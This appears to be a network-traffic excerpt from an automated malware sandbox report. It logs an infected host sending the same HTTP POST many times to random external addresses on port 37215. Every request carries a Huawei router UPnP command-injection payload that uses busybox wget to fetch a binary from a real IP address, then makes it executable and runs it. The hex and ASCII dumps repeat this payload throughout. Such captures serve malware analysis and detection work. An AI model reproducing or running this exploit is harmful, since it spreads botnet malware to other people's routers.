                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2067192.168.2.1541514138.45.196.9637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103566885 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2068192.168.2.1537046122.207.141.9837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103594065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2069192.168.2.154282094.145.159.1437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103631020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2070192.168.2.1543026197.196.251.15437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103697062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2071192.168.2.1535206115.42.73.3837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103703976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2072192.168.2.153762841.100.80.19237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103802919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2073192.168.2.153339031.189.218.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103836060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2074192.168.2.1551458157.77.185.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103836060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2075192.168.2.1538722190.165.196.24937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103863955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2076192.168.2.1539270190.18.212.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103868008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
